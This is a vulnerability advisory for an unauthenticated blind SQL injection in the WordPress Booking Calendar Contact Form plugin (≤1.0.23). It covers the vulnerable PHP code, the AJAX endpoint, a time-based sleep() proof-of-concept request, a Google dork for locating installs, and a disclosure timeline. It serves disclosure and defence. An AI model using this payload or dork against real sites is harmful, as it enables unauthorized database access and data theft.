WordPress Booking Calendar Contact Form 1.0.23 Blind SQL Injection

`# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection  
# Date: 2016-02-08  
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form  
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]  
# Vendor Homepage: http://wordpress.dwbooster.com/  
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form  
# Version: 1.0.23  
# Tested on: windows 10 + firefox.   
  
==============  
Description  
==============  
  
Create a booking form with a reservation calendar or a classic contact form, connected to   
a PayPal payment button.  
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a   
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation   
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.  
  
The **reservation calendar** is an optional item, so it can be disabled to create a **general   
purpose contact form**.  
  
There are two types of bookings available in the calendar configuration: full day bookings or   
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial   
day bookings the start and end dates are partially blocked as used for example in   
**room/hotel bookings**.  
  
===================  
Technical details   
===================  
  
Booking calendar plugin is prone to a blind sql injection because fails to sanitize a   
parameter used into a sql statement.   
The function ´dex_bccf_get_option´ uses a variable called ´CP_BCCF_CALENDAR_ID´ which is not sanitized  
and is used as value for the ´id´ of sql parameter.  
The vulnerable function is called into many other functions, and one of those is ´dex_bccf_calendar_load2´   
which sets the ´CP_BCCF_CALENDAR_ID´ with the following code:  
  
""  
$calid = str_replace(TDE_BCCFCAL_PREFIX, "", @$_GET["id"]);  
if (!defined('CP_BCCF_CALENDAR_ID') && $calid != '-1')  
define('CP_BCCF_CALENDAR_ID', $calid);  
""  
  
and then the function ´dex_bccf_get_option´ is called into ´dex_bccf_calendar_load2´ function:  
  
"" ...  
$option = dex_bccf_get_option('calendar_overlapped', DEX_BCCF_DEFAULT_CALENDAR_OVERLAPPED);  
...  
""  
  
The ´dex_bccf_calendar_load2´ function is called when we request the next url:  
  
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent  
&dex_bccf_calendar_load2=list&id=<SQLI commands>  
  
A malicious unauthenticated user can exploit the sql injection and obtain all records from database.  
  
==================  
Proof of concept  
==================  
  
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent  
&dex_bccf_calendar_load2=list&id=1%20and%20sleep(10)  
  
==========  
CREDITS  
==========  
  
Vulnerability discovered by:  
Joaquin Ramirez Martinez [i0 security-lab]  
joaquin.ramirez.mtz.lab[at]gmail[dot]com  
https://www.facebook.com/I0-security-lab-524954460988147/  
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q  
  
  
========  
TIMELINE  
========  
  
2016-02-01 vulnerability discovered  
2016-02-05 reported to vendor  
2016-02-08 released fixed plugin v1.0.24  
2016-02-08 public disclosure  
`